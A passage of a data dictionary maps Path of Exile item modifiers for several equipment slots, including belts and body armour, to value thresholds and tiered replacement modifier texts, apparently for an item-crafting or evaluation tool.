"+# to maximum Energy Shield": [(50, '(4 - 5)% increased maximum Energy Shield'), (100, '(6 - 7)% increased maximum Energy Shield'), (130, '(8 - 10)% increased maximum Energy Shield'), (500, '(8 - 10)% increased maximum Energy Shield\n10% increased Maximum total Recovery per second from Energy Shield Leech')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (230, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+# to maximum Mana": [(100, '6% increased maximum Mana'), (200, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n3% reduced Damage taken from Damage Over Time')],
"+#% to Cold Resistance": [(50, '(11 - 12) to Cold Resistance'), (100, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\nPurity of Ice has (40 - 30)% reduced Mana Reservation')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '(11 - 12) to Fire Resistance'), (100, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\nPurity of Fire has (40 - 30)% reduced Mana Reservation')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(40, '12 to Global Critical Strike Multiplier'), (70, '(13 - 14) to Global Critical Strike Multiplier'), (90, '(15 - 16) to Global Critical Strike Multiplier'), (105, '(17 - 18) to Global Critical Strike Multiplier'), (300, '(19 - 20) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '(11 - 12) to Lightning Resistance'), (100, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\nPurity of Lightning has (40 - 30)% reduced Mana Reservation')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to all Elemental Resistances": [(15, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance'), (30, '(13 - 14) to Fire Resistance\n(13 - 14) to Cold Resistance\n(13 - 14) to Lightning Resistance'), (45, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance'), (100, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance\n1 to all maximum Resistances')],
"Adds # to # Chaos Damage to Attacks": [(40, '(11 - 12)% increased Chaos Damage'), (75, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Cold Damage to Attacks": [(30, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (90, '(15 - 16)% increased Cold Damage'), (105, '(15 - 16)% increased Cold Damage\n0.5% of Cold Damage Leeched as Life')],
"Adds # to # Fire Damage to Attacks": [(40, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (120, '(15 - 16)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\n0.5% of Fire Damage Leeched as Life')],
"Adds # to # Lightning Damage to Attacks": [(75, '(11 - 12)% increased Lightning Damage'), (150, '(13 - 14)% increased Lightning Damage'), (190, '(15 - 16)% increased Lightning Damage'), (300, '(15 - 16)% increased Lightning Damage\n0.5% of Lightning Damage Leeched as Life')],
"Adds # to # Physical Damage to Attacks": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (70, '(15 - 16)% increased Global Physical Damage'), (100, '(15 - 16)% increased Global Physical Damage\n0.5% of Physical Damage Leeched as Life')],
"Cannot be Chilled or Frozen while moving": [(1, '(14 - 16)% chance to Avoid being Chilled\n(13 - 14)% chance to Avoid being Frozen'), (2, '(18 - 21)% chance to Avoid being Chilled\n(15 - 17)% chance to Avoid being Frozen'), (5, '(22 - 25)% chance to Avoid being Chilled\n(18 - 20)% chance to Avoid being Frozen')],
"Damage Penetrates #% Elemental Resistances": [(6, '(17 - 19)% increased Elemental Damage'), (12, '(20 - 22)% increased Elemental Damage'), (50, '(23 - 26)% increased Elemental Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Skills Cost no Mana while Focussed": [(2, '-1 to Total Mana Cost of Skills\n2% reduced Mana Cost of Skills'), (5, '-2 to Total Mana Cost of Skills\n3% reduced Mana Cost of Skills')],
"You have Vaal Pact while Focussed": [(1, '(10 - 12)% increased Damage while Leeching'), (2, '(13 - 15)% increased Damage while Leeching'), (5, '0.5% of Fire Damage Leeched as Life\n0.5% of Cold Damage Leeched as Life\n0.5% of Lightning Damage Leeched as Life\n0.5% of Physical Damage Leeched as Life\n0.5% of Chaos Damage Leeched as Life')],
},
"Belt": {
"# Energy Shield Regenerated per second while a Rare or Unique Enemy is Nearby": [(333.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (416.67, '(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction during any Flask Effect": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance for your Flasks to not consume Charges": [(10, '(11 - 10)% reduced Flask Charges used'), (20, '(13 - 12)% reduced Flask Charges used'), (50, '(15 - 14)% reduced Flask Charges used')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to gain Onslaught when you use a Flask": [(25, '3% increased Attack and Cast Speed'), (50, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed\n(5 - 8)% chance to gain Onslaught for 4 seconds on Kill')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nYou take (15 - 25)% reduced Extra Damage from Critical Strikes')],
"#% increased Chaos Damage": [(20, '(9 - 10)% increased Chaos Damage'), (40, '(11 - 12)% increased Chaos Damage'), (60, '(13 - 14)% increased Chaos Damage'), (80, '(15 - 16)% increased Chaos Damage'), (200, '(17 - 20)% increased Chaos Damage')],
"#% increased Cold Damage": [(20, '(9 - 10)% increased Cold Damage'), (40, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (80, '(15 - 16)% increased Cold Damage'), (200, '(17 - 20)% increased Cold Damage')],
"#% increased Damage": [(25, '(10 - 11)% increased Damage'), (55, '(12 - 13)% increased Damage'), (100, '(14 - 15)% increased Damage')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments')],
"#% increased Effect of Flasks on you": [(20, '(10 - 11)% increased Flask Effect Duration'), (35, '(12 - 13)% increased Flask Effect Duration'), (100, '(14 - 15)% increased Flask Effect Duration')],
"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (200, '(15 - 16)% increased Elemental Damage')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nDamage with Weapons Penetrates (4 - 6)% Fire Resistance\nDamage with Weapons Penetrates (4 - 6)% Cold Resistance\nDamage with Weapons Penetrates (4 - 6)% Lightning Resistance')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Fire Damage": [(20, '(9 - 10)% increased Fire Damage'), (40, '(11 - 12)% increased Fire Damage'), (60, '(13 - 14)% increased Fire Damage'), (80, '(15 - 16)% increased Fire Damage'), (200, '(17 - 20)% increased Fire Damage')],
"#% increased Flask Charges gained": [(30, '(10 - 11)% increased Flask Charges gained'), (60, '(12 - 13)% increased Flask Charges gained'), (80, '(14 - 15)% increased Flask Charges gained'), (150, '(14 - 15)% increased Flask Charges gained\nRemove Ignite and Burning when you use a Flask')],
"#% increased Flask Effect Duration": [(20, '(10 - 11)% increased Flask Effect Duration'), (40, '(12 - 13)% increased Flask Effect Duration'), (50, '(14 - 15)% increased Flask Effect Duration'), (100, '(14 - 15)% increased Flask Effect Duration\nRemove Shock when you use a Flask')],
"#% increased Flask Life Recovery rate": [(25, '(5.0 - 7.0) Life Regenerated per second'), (50, '(7.02 - 11.67) Life Regenerated per second'), (75, '(11.68 - 18.33) Life Regenerated per second'), (150, '(11.68 - 18.33) Life Regenerated per second\n(10 - 15)% increased Life Recovery rate')],
"#% increased Flask Mana Recovery rate": [(25, '(16 - 18)% increased Mana Regeneration Rate'), (50, '(19 - 21)% increased Mana Regeneration Rate'), (70, '(22 - 24)% increased Mana Regeneration Rate'), (100, '(22 - 24)% increased Mana Regeneration Rate\n(10 - 15)% increased Mana Recovery rate')],
"#% increased Global Physical Damage": [(20, '(9 - 10)% increased Global Physical Damage'), (40, '(11 - 12)% increased Global Physical Damage'), (60, '(13 - 14)% increased Global Physical Damage'), (80, '(15 - 16)% increased Global Physical Damage'), (200, '(17 - 20)% increased Global Physical Damage')],
"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(10 - 15)% increased Life Recovery rate')],
"#% increased Lightning Damage": [(20, '(9 - 10)% increased Lightning Damage'), (40, '(11 - 12)% increased Lightning Damage'), (60, '(13 - 14)% increased Lightning Damage'), (80, '(15 - 16)% increased Lightning Damage'), (200, '(17 - 20)% increased Lightning Damage')],
"#% increased Mana Recovery rate": [(15, '(22 - 24)% increased Mana Regeneration Rate'), (30, '(25 - 27)% increased Mana Regeneration Rate'), (100, '(28 - 30)% increased Mana Regeneration Rate\n(10 - 15)% increased Mana Recovery rate')],
"#% increased Movement Speed during any Flask Effect": [(11, '4% increased Movement Speed'), (25, '(5 - 6)% increased Movement Speed'), (50, '(7 - 8)% increased Movement Speed')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(18 - 25)% increased Stun Duration on Enemies\n(20 - 25)% increased Area of Effect if you have Stunned an Enemy Recently')],
"#% increased Stun and Block Recovery": [(50, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (150, '(14 - 15)% chance to Avoid being Stunned\n100% chance to avoid Bleeding')],
"#% increased Trap Throwing Speed": [(30, '(2 - 3)% increased Trap Throwing Speed'), (100, '(4 - 5)% increased Trap Throwing Speed')],
"#% of Life Regenerated per second during any Flask Effect": [(2.5, '(0.6 - 0.7)% of Life Regenerated per second'), (5.0, '(0.8 - 0.93)% of Life Regenerated per second'), (8.33, '1.0% of Life Regenerated per second')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Flask Charges used": [(20, '(11 - 10)% reduced Flask Charges used'), (40, '(13 - 12)% reduced Flask Charges used'), (50, '(15 - 14)% reduced Flask Charges used'), (100, '(15 - 14)% reduced Flask Charges used\nRemove Chill and Freeze when you use a Flask')],
"+# to Armour": [(500, '(7 - 9)% increased Armour'), (1000, '(10 - 12)% increased Armour'), (1500, '(13 - 15)% increased Armour'), (2000, '(13 - 15)% increased Armour\n(4 - 6)% additional Physical Damage Reduction while affected by Determination')],
"+# to Armour and Evasion Rating": [(350, '(7 - 9)% increased Armour\n(7 - 9)% increased Evasion Rating'), (700, '(10 - 12)% increased Armour\n(10 - 12)% increased Evasion Rating'), (1500, '(13 - 15)% increased Armour\n(13 - 15)% increased Evasion Rating')],
"+# to Dexterity": [(100, '(7 - 9)% increased Dexterity'), (130, '(10 - 12)% increased Dexterity'), (160, '(13 - 15)% increased Dexterity'), (200, '(13 - 15)% increased Dexterity\n6% increased Evasion Rating per Frenzy Charge')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments'), (1000, '(13 - 15)% increased Evasion Rating\n(4 - 6) chance to Evade Attacks while affected by Grace')],
"+# to Intelligence": [(100, '(7 - 9)% increased Intelligence'), (130, '(10 - 12)% increased Intelligence'), (160, '(13 - 15)% increased Intelligence'), (200, '(13 - 15)% increased Intelligence\n6% increased Spell Damage per Power Charge')],
"+# to Strength": [(100, '(7 - 9)% increased Strength'), (130, '(10 - 12)% increased Strength'), (160, '(13 - 15)% increased Strength'), (200, '(13 - 15)% increased Strength\n0.3% of maximum Life Regenerated per second per Endurance Charge')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(7 - 9)% increased maximum Energy Shield'), (100, '(10 - 13)% increased maximum Energy Shield'), (130, '(14 - 16)% increased maximum Energy Shield'), (500, '(14 - 16)% increased maximum Energy Shield\n(1.2 - 2.2)% of Maximum Energy Shield Regenerated per Second while affected by Discipline')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (280, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+#% to Chaos Resistance": [(100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n100% chance to Avoid being Poisoned')],
"+#% to Chaos Resistance during any Flask Effect": [(60, '(5 - 6) to Chaos Resistance'), (120, '(7 - 8) to Chaos Resistance'), (500, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '(11 - 12) to Cold Resistance'), (100, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n100% chance to Avoid being Frozen')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '(11 - 12) to Fire Resistance'), (100, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n100% chance to Avoid being Ignited')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '(11 - 12) to Lightning Resistance'), (100, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n100% chance to Avoid being Shocked')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Damage Penetrates #% Elemental Resistances during any Flask Effect": [(6, '(11 - 12)% increased Elemental Damage'), (12, '(13 - 14)% increased Elemental Damage'), (50, '(15 - 16)% increased Elemental Damage')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Reflects # Physical Damage to Melee Attackers": [(10, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (20, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (30, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Vaal Skills deal #% increased Damage": [(55, 'Vaal Skills deal (13 - 16)% increased Damage'), (110, 'Vaal Skills deal (17 - 21)% increased Damage'), (200, 'Increases and Reductions to Damage of Vaal Skills also apply to Non-Vaal Skills')],
"Your Critical Strike Chance is Lucky while Focussed": [(1, '(14 - 15)% increased Global Critical Strike Chance'), (2, '(16 - 17)% increased Global Critical Strike Chance'), (5, '(18 - 20)% increased Global Critical Strike Chance')],
},
"Body Armour": {
"# Energy Shield Regenerated per second while a Rare or Unique Enemy is Nearby": [(333.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (416.67, '(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% Chance to Block Attack Damage": [(19, '2% Chance to Block Attack Damage'), (50, '(4 - 5)% Chance to Block Attack Damage')],
"#% additional Physical Damage Reduction": [(5, '2% additional Physical Damage Reduction'), (9, '3% additional Physical Damage Reduction'), (50, '4% additional Physical Damage Reduction')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid Elemental Damage from Hits during Soul Gain Prevention": [(20, '(3 - 4) to all Elemental Resistances'), (50, '(5 - 6) to all Elemental Resistances')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Dodge Attack Hits": [(25, '2% chance to Dodge Attack Hits'), (50, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(20, '2% chance to Dodge Spell Hits'), (50, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain Onslaught for 3 seconds when Hit": [(210, '4% increased Movement Speed'), (500, '(5 - 6)% increased Movement Speed\n(10 - 12)% increased Attack and Cast Speed during Onslaught')],
"#% chance to gain a Frenzy Charge when Hit": [(25, '3% increased Attack and Cast Speed'), (50, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed')],
"#% chance to gain an additional Vaal Soul on Kill": [(50, '5% reduced Damage taken if Corrupted')],
"#% increased Area of Effect": [(11, '(5 - 6)% increased Area of Effect'), (21, '(7 - 8)% increased Area of Effect'), (50, '(9 - 10)% increased Area of Effect')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(15 - 20)% chance when Hit for double Armour effect')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% Global chance to Blind Enemies on hit')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% Global chance to Blind Enemies on hit\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Attributes": [(17, '2% increased Attributes'), (50, '3% increased Attributes')],
"#% increased Effect of Auras on you": [(65, 'Determination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation'), (100, 'Determination has (15 - 20)% increased Aura Effect\nGrace has (15 - 20)% increased Aura Effect\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Effect of Fortify on you while Focussed": [(150, '5% increased Effect of Fortify on you'), (300, '10% increased Effect of Fortify on you'), (500, '15% increased Effect of Fortify on you')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(10 - 15)% Global chance to Blind Enemies on hit')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% Global chance to Blind Enemies on hit\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% of Damage is taken from Mana before Life": [(25, '(2 - 3)% of Physical Damage is taken from Mana before Life when Hit'), (50, '(4 - 5)% of Physical Damage is taken from Mana before Life when Hit')],
"#% of Damage is taken from Mana before Life while Focussed": [(60, '(2 - 3)% of Physical Damage is taken from Mana before Life when Hit'), (200, '(4 - 5)% of Physical Damage is taken from Mana before Life when Hit')],
"#% of Energy Shield Regenerated per second": [(1.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (2.0, '(0.8 - 0.9)% of Energy Shield Regenerated per second'), (8.33, '1.0% of Energy Shield Regenerated per second')],
"#% of Evasion Rating is Regenerated as Life per second while Focussed": [(2.83, '(0.6 - 0.7)% of Life Regenerated per second'), (8.33, '(0.8 - 0.93)% of Life Regenerated per second')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Damage from Hits taken as Cold Damage": [(16, '(11 - 12) to Cold Resistance'), (32, '(13 - 14) to Cold Resistance'), (100, '(15 - 16) to Cold Resistance\n(7 - 10)% of Physical Damage from Hits taken as Cold Damage')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1% reduced Damage taken per 250 Strength\n1% reduced Damage taken per 250 Dexterity\n1% reduced Damage taken per 250 Intelligence')],
